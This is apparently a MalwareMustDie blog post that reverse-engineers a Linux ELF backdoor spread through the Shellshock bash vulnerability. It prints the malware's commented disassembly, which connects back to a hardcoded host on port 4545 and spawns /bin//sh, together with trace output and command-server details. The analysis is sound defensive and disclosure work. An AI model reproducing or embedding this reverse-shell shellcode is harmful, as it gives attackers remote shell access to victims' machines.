MMD-0027-2014 - Linux/Bashdoor & small backdoor - at 0day (shellshock): The fun has only just begun.. (Part 1)

Background: CVE-2014-6271 + CVE-2014-7169

During the mayhem of bash 0day remote execution vulnerability CVE-2014-6271 and CVE-2014-7169, not for bragging but as a FYI, I happened to be the first who reversed for the first ELF malware spotted used in the wild. The rough disassembly analysis and summary I wrote and posted in Virus Total & Kernel Mode here --> [-1-] [-2-] < thanks to Yinettesys (credit) (the credit is all for her for links to find this malware, for the swift sensoring & alert, and thanks for analysis request, we won't aware of these that fast w/o her).

The fun has only just begun...

Yes. Today I was informed there is another payload distributed, thank's to my good friend :

Which leads to this malicious ELF file served online:

Do the pure reversing..

This ELF "malware" is working differently, it connects to remote host with attempt to bind connection on the certain port while spawning the shell "/bin//sh" upon connected, yes, a remote shell backdoor. Coded with ASM & shellcode to Linux kernel's system call addresses.
For your conveniences, I wrote my decoding scratch & disassembly of all malware bits below in comments, for all of us to see how it works:

0x08048054    31db         xor ebx, ebx
0x08048056 f7e3 mul ebx
0x08048058 53 push ebx
0x08048059 43 inc ebx // = "SYS_SOCKET" = "socket" ()
0x0804805a 53 push ebx // Build arg array for INET { protocol = 0, push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, push BYTE 0x2 ; AF_INET = 2 }
0x0804805b 6a02 push 0x2 // 0x0002 = "PF_INET"
0x0804805d 89e1 mov ecx, esp // ecx = pointer to arg array
0x0804805f b066 mov al, 0x66 // socketcall (syscall # 102)
0x08048061 cd80 int 0x80 // call interrupt / exec
0x08048063 93 xchg ebx, eax
0x08048064 59 pop ecx
0x08048065 b03f mov al, 0x3f // <=== system call: _connect()
0x08048067 cd80 int 0x80 // call interrupt _syscall
0x08048069 49 dec ecx
0x0804806a 79f9 jns 0x108048065 // loop to re connect..
0x0804806c 681b139fe0 push 0xe09f131b // 0xe09f131b addr "to IP"
0x08048071 68020011c1 push 0xc1110002 // 0xc1110002 addr "to ports#"
0x08048076 89e1 mov ecx, esp // server strct pointer
0x08048078 b066 mov al, 0x66 // socketcall (syscall # 102)
0x0804807a 50 push eax
0x0804807b 51 push ecx // value: "\002" // AF_INET = 2
0x0804807c 53 push ebx // ebx =2 = sys_bind / bind()
0x0804807d b303 mov bl, 0x3 // system call: _connect()
0x0804807f 89e1 mov ecx, esp //ecx = "arguement array" "\a"
0x08048081 cd80 int 0x80 // int 0x80 .. _syscall / call interrupt / exec
0x08048083 52 push edx ; push null string termination
0x08048084 682f2f7368 push 0x68732f2f // push "//sh" to the stack
0x08048089 682f62696e push 0x6e69622f //push "/bin" to the stack
0x0804808e 89e3 mov ebx, esp // addr of "/bin//sh" into ebx via esp
0x08048090 52 push edx // push x32 null terminator to stack
0x08048091 53 push ebx // push string address to stack up from null terminator point
0x08048092 89e1 mov ecx, esp // arg array with string ptr
0x08048094 b00b mov al, 0xb
0x08048096 cd80 int 0x80 // execve("/bin//sh", ["/bin//sh", NULL], [NULL])
↑this is all to find out it back-connects to ip in port 4545 & spawning shell "/bin//sh" of the infected host after connected to that remote host. I think I saw this as shellcode, was used in about a lot in 2011 or 2012..

Just in case you want to see how I reversed it: (guess.. what tool is it?? *smile)

Confirming reverse engineering:

dup2(3, 2) = 2
dup2(3, 1) = 1
dup2(3, 0) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(4545), sin_addr=inet_addr("")
The dup stub burps as per coded strings. It is self-explanatory.

Reversing is confirmed, next step is... let's bang their door! :-))

fu4k   12467   mmd    0u     IPv4       243888042   0t0    TCP> (SYN_SENT)
fu4k 12467 mmd 1u IPv4 243888042 0t0 TCP> (SYN_SENT)
fu4k 12467 mmd 2u IPv4 243888042 0t0 TCP> (SYN_SENT)
fu4k 12467 mmd 3u unix 0xffff88018aad94c0 0t0 243884464 socket
fu4k 12467 mmd 4u unix 0xffff88018aad8e40 0t0 243884465 socket
fu4k 12467 mmd 5u unix 0xffff88018aad8e40 0t0 243884465 socket
fu4k 12467 mmd 6r FIFO 0,8 0t0 243884466 pipe
fu4k 12467 mmd 7w FIFO 0,8 0t0 243884466 pipe
fu4k 12467 mmd 8u IPv4 243888042 0t0 TCP> (SYN_SENT)
It looks like he doesn't want to play with my "knock knock" game.. :-(( #bummer

This is the CNC IP source:

IP: ""
ASN: "4134"
CIDR: ""
Contry: "CN"

Detection ratio

As always for a new ELF malware found.. AV detection is ZERO (FUD/FullyUnDetected):

Sample is (always) shared

I am sharing the sample in kernelmode, I register new ELF malware repository name: "Linux/binsh" < since it uses "/bin//sh" as shell in hard coded shellcode-->[LINK]


So we have "another" crook start playing with ELF hacks for spying purpose on shellshock too :-)

Thank you

Thank you to IT media article who directly mentioned and linked to us:

Thank you to the IT media article who mentioned our work:

Thank you for blog and commments links:

Stay safe..there will be more of these.. #MalwareMustDie!